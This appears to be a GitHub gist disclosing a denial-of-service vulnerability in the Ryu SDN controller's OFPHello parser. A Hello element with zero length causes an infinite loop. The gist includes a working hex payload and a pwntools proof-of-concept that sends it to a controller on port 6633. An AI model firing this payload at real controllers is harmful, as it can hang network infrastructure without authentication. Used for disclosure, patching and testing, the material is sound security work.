Skip to content

Instantly share code, notes, and snippets.

@ErodedElk

ErodedElk/Ryu_OFPHello.md

Created April 9, 2024 17:28
Show Gist options
  • Save ErodedElk/00082066a2a3638894089d6dcdaf7626 to your computer and use it in GitHub Desktop.
Save ErodedElk/00082066a2a3638894089d6dcdaf7626 to your computer and use it in GitHub Desktop.
Download ZIP
An issue was discovered in OFPHello in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).
Raw
Ryu_OFPHello.md

in /ryu/ofproto/ofproto_v1_3_parser.py about line=139

class OFPHello(MsgBase):
...
    @classmethod
    def parser(cls, datapath, version, msg_type, msg_len, xid, buf):
        msg = super(OFPHello, cls).parser(datapath, version, msg_type,
                                          msg_len, xid, buf)

        offset = ofproto.OFP_HELLO_HEADER_SIZE
        elems = []
        while offset < msg.msg_len:
            type_, length = struct.unpack_from(
                ofproto.OFP_HELLO_ELEM_HEADER_PACK_STR, msg.buf, offset)
            ...
            offset += length
        msg.elements = elems
        return msg

If the variable length is equal to 0,the offset will no longer change and the parsing will fall into an infinite loop.

payload:

payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)

poc:

from pwn import *
p=remote("0.0.0.0",6633)
payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)p.send(payload)
p.send(payload)
p.interactive()

The Hello message is the first step in the handshake process, which means that all malicious traffic can put the controller into an infinite loop before establishing a connection with the controller.

This problem also occurs with the following code:

/ryu/ofproto/ofproto_v1_3_parser.py about line=139
/ryu/ofproto/ofproto_v1_4_parser.py about line=103
/ryu/ofproto/ofproto_v1_5_parser.py about line=104
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment